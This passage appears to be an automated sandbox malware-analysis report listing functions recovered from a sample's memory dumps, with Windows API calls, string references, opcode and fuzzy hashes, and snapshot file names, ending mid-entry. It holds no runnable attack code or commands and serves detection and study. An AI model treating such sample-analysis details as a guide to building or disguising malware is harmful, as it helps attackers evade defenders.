Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44

Function 024C2339 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024C2334,?,?,00000008,?,?,024C5679,00000000), ref: 024C2566

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
Instruction ID: e659ad4b26e075051f1367931a156d676aaafb482523f69d3d563eeb6f0973bd
Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
Instruction Fuzzy Hash: 15B14A392106099FD755CF2CC49AB667BA0FF04368F25865DEC9ACF2A1C3B5D992CB40

Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON

Download Yara Rule

Strings

0, xrefs: 00432A55

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A

Function 024A2CB0 Relevance: 1.8, Strings: 1, Instructions: 500COMMON

Download Yara Rule

Strings

0, xrefs: 024A2CBC

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
Instruction ID: 7191454c44470aa850f0374feffd920e409df2b10c0e1ed1c40c276c89dd3d5c
Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
Instruction Fuzzy Hash: 0502713270D3008BD714DF39D961A2FF3E2BFC8754F15492EE985AB380DA74A845DA86

Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99

Function 024C1321 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

Part of subcall function 024B7126: _free.LIBCMT ref: 024B7185
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B7192

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024C1375

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: a9a0ef56855296d69f28970e91aa7ff08aa6ba5c63fbad7abcadd9e72279b5a0
Instruction ID: 0f75031963503eafde4040bd4a6d2f5f5a0ffcf2295524446e01a0ae9143b6f0
Opcode Fuzzy Hash: a9a0ef56855296d69f28970e91aa7ff08aa6ba5c63fbad7abcadd9e72279b5a0
Instruction Fuzzy Hash: 9521C4765202069BEF24AB1DDC40BB773A8EF40314F20017FED09C6A51EBB59940CB50

Function 024C0FA9 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,024B3F53,?,024C16FE,00000000,?,?,?), ref: 024C101B

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
Instruction ID: 3823e1e8c17b0742d93821d87deac9b7febb3e00ebb0d5a2a10f532b50e985f9
Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
Instruction Fuzzy Hash: 2311063A2003019FDB289F3998916BAB792FF80368B24442EE94B87B41D375A442CB50

Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4

Function 024C1551 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024C12EF,00000000,00000000,?), ref: 024C157D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction ID: 5d75433bc4d01a260554cdea7db5a0e4184cda3b1a8aecb357e20755c0024420
Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction Fuzzy Hash: FEF0F93A900215ABDB249A298C05FBB7768EB40314F24056EEC0EA3241EB70FD42CAD0

Function 024C1044 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,024B3F53,?,024C16C2,024B3F53,?,?,?,?,?,024B3F53,?,?), ref: 024C1090

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
Instruction ID: 3126d6227f07eec6a0ed2fa24f19d4c661949e3f7c22151b71306510341f85fe
Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
Instruction Fuzzy Hash: A7F028363003045FDB255F3A9C80B6B7BD1EF80368B15403EF90987A81D37198028A50

Function 024B77FE Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024B39B1,?,00000004), ref: 024B7851

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction ID: 06264d266178764642dba2c509b6a26d1fd814cc41df51fcad3c4ae71c70a110
Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction Fuzzy Hash: 9EF0BB32A45308BBCF126F65DC05FBEBF66DF44711F00416AFC0556251CB719A10DAEA

Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00444ACC: RtlEnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB

EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49

Function 024B7315 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B4D33: RtlEnterCriticalSection.NTDLL(?), ref: 024B4D42

EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 024B734D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
Instruction ID: ae85adb954f5f8950783a91aebbc9feaf99d7ef3afb301bf28c20931d6d6c45e
Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
Instruction Fuzzy Hash: BFF04932A50204EFD705EF78E805B8D77B1EF45721F10816AF814DB2A0CBB889808F69

Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754

Function 024C0F5E Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B7126: GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
Part of subcall function 024B7126: _free.LIBCMT ref: 024B715D
Part of subcall function 024B7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
Part of subcall function 024B7126: _abort.LIBCMT ref: 024B71A4

EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,024C1720,024B3F53,?,?,?,?,?,024B3F53,?,?,?), ref: 024C0F95

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
Instruction ID: aad7dde54b427314cef9b45404e9ad6d9103ad8ab8f1690208f941a4908a181f
Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
Instruction Fuzzy Hash: F0F0E53A30020597CB1A9F39DC45B6ABF94EFC2711B1640AEFA0A8B691C7759882C760

Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

Function 0247E8E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02484814,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,0046673C), ref: 0247E8F4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
Instruction ID: b3094a3072c3cf70db0a6dfa26ced9d38eb3ff890d031ec704657a5f7e592e4d
Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
Instruction Fuzzy Hash: 79D09E657442187BEA1496959C0AE9B7A9CE741B96F000165BA01D72C0E9E0AE048AE1

Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00426101

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
Instruction Fuzzy Hash:

Function 0043CE3B Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

BG3i@, xrefs: 0043CE3D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: BG3i@
API String ID: 0-2407888476
Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E

Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 0043CD7C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E

Function 024ACE73 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 024ACFE3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction ID: 9ad49afe1012b155be9841bf7dbbc0325e23c87eace29b22b834f57b56ccb5b7
Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction Fuzzy Hash: B0515862A08A4496DBB48A7CC5F57BF67DA9B32248F08081FF883CB7C1C715D646C792

Function 024ACC44 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 024ACDB4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
Instruction ID: c44d3fd16fe6fe116984fa589abf79c532721b808117a675d077ce7d687a86a9
Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
Instruction Fuzzy Hash: 1E515471600A4497DFB88A78C4F57BF2BAA9B76308F08090FD887DB7A1D705D642C752

Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

@, xrefs: 00426EC4

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86

Function 024970DA Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

@, xrefs: 0249712B

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
Instruction ID: 385b88ff35aae1f0ec7a4a60a976af1627c78a92e338d1997f95224edbc5404d
Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
